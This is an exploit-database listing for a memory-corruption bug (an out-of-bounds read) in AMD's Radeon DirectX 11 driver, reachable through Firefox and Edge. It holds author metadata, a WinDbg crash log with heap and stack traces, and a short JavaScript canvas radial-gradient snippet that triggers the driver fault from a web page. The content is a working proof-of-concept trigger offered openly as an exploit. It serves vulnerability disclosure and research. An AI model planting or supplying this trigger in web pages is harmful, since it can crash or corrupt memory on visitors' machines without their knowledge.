Exploit for AMD Radeon DirectX 11 Driver 8.17.10.0871 Memory Corruption

Name: Exploit for AMD Radeon DirectX 11 Driver 8.17.10.0871 Memory Corruption
Rating: 5 (579 reviews)
2020-04-23 | CVSS 0.5
## https://sploitus.com/exploit?id=PACKETSTORM:157364
/*  
Title : Advanced Micro Devices, Inc. Radeon DirectX 11 Driver (Firefox/MS Edge) Memory Corruption  
Date : 10.04.2020   
Exploit Author : Marcin Ressel  
Vendor Homepage : https://www.amd.com/  
Software Link: n/a  
Version: 8.17.10.0871 (atidxx64.dll)  
Tested on: Windows 10 home, AMD64 Family 23 Model 24 Stepping 1 AuthenticAMD ~2100 Mhz,  
Firefox 74.0 (64 bity)  
MS Edge   
----  
24a5122ef60 - 24a512270f0 = 0x7E70 && 0x7f10 - 0x7E70 = A0 = offset = OUT_OF_BOUNDS READ  
----  
0:123> g  
(2560.1f28): Access violation - code c0000005 (!!! second chance !!!)  
atidxx64!AmdDxGsaFreeCompiledShader+0x45901d:  
00007ffc`994cfecd 83bba000000013 cmp dword ptr [rbx+0A0h],13h ds:0000024a`5122f000=????????  
0:123> !heap -p -a @rbx  
24a512270f0  
address 0000024a5122ef60 found in   
_DPH_HEAP_ROOT @ 24a50701000  
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)  
24a653f10d0: 24a512270f0 7f10 - 24a51227000 9000  
00007ffca7204847 ntdll!RtlDebugAllocateHeap+0x000000000000003f  
00007ffca71b4a16 ntdll!RtlpAllocateHeap+0x0000000000077b26  
00007ffca713babb ntdll!RtlpAllocateHeapInternal+0x00000000000001cb  
00007ffc99378a05 atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000301b55  
00007ffc996af263 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000006383b3  
00007ffc996ae802 atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000637952  
00007ffc993e9891 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000003729e1  
00007ffc9917a7db atidxx64!AmdDxGsaFreeCompiledShader+0x000000000010392b  
00007ffc9917949b atidxx64!AmdDxGsaFreeCompiledShader+0x00000000001025eb  
00007ffc99169680 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000000f27d0  
00007ffc99148e8a atidxx64!AmdDxGsaFreeCompiledShader+0x00000000000d1fda  
00007ffc990951f4 atidxx64!AmdDxGsaFreeCompiledShader+0x000000000001e344  
00007ffc998509ce atidxx64!AmdDxGsaFreeCompiledShader+0x00000000007d9b1e  
00007ffc9984b950 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000007d4aa0  
00007ffc99826a26 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000007afb76  
00007ffc990aedcb atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000037f1b  
00007ffc990ae6a9 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000000377f9  
00007ffc99952114 atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0x00000000000a4654  
00007ffca6747bd4 KERNEL32!BaseThreadInitThunk+0x0000000000000014  
00007ffca716ced1 ntdll!RtlUserThreadStart+0x0000000000000021  
  
  
0:123> kb  
# RetAddr : Args to Child : Call Site  
00 00007ffc`994b4f3e : 0000024a`5122db98 0000024a`50dcef01 0000024a`5c27b600 0000024a`51228650 : atidxx64!AmdDxGsaFreeCompiledShader+0x45901d  
01 00007ffc`99166094 : 0000024a`00000000 0000024a`00000000 0000024a`51211fc0 00000056`0743ec89 : atidxx64!AmdDxGsaFreeCompiledShader+0x43e08e  
02 00007ffc`9917a1d3 : 0000024a`5122db80 0000024a`51211fc0 0000024a`0000002d 0000024a`51211fc0 : atidxx64!AmdDxGsaFreeCompiledShader+0xef1e4  
03 00007ffc`99169680 : 0000024a`60901a50 0000024a`50e63108 00000000`00000002 0000024a`60901a50 : atidxx64!AmdDxGsaFreeCompiledShader+0x103323  
04 00007ffc`99148e8a : 0000024a`60901a50 0000024a`50ddb1f0 0000024a`50dd6400 0000024a`60901a50 : atidxx64!AmdDxGsaFreeCompiledShader+0xf27d0  
05 00007ffc`990951f4 : 00000000`00000001 0000024a`50dd6400 0000024a`50ddb1f0 0000024a`50ae0ec0 : atidxx64!AmdDxGsaFreeCompiledShader+0xd1fda  
06 00007ffc`998509ce : 00000000`00000000 00000056`0743f5a0 0000024a`50dd6400 0000024a`5085c4c0 : atidxx64!AmdDxGsaFreeCompiledShader+0x1e344  
07 00007ffc`9984b950 : 0000024a`00000000 0000024a`507d7d08 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7d9b1e  
08 00007ffc`99826a26 : 00000000`00000000 00000000`00000000 0000024a`50cfafe0 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7d4aa0  
09 00007ffc`990aedcb : 0000024a`50cfafe0 00000000`00000000 0000024a`5dc8ffd0 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7afb76  
0a 00007ffc`990ae6a9 : 00000000`00000000 0000024a`57423fd0 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x37f1b  
0b 00007ffc`99952114 : 0000024a`57423fd0 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x377f9  
0c 00007ffc`a6747bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0xa4654  
0d 00007ffc`a716ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14  
0e 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21  
*/  
  
var canvas=document.createElement("canvas");  
document.body.appendChild(canvas);  
var context = canvas.getContext("2d")  
  
function radioActiveGradient() {  
var ret = context.createRadialGradient(1,1,0,1,0.6898449305444956,1);  
ret.addColorStop(0,"rgb(1,1,1)");  
return ret;   
}  
  
context.arc(1,0.6898449305444956,1,0,1);  
context.strokeStyle=radioActiveGradient();  
context.stroke()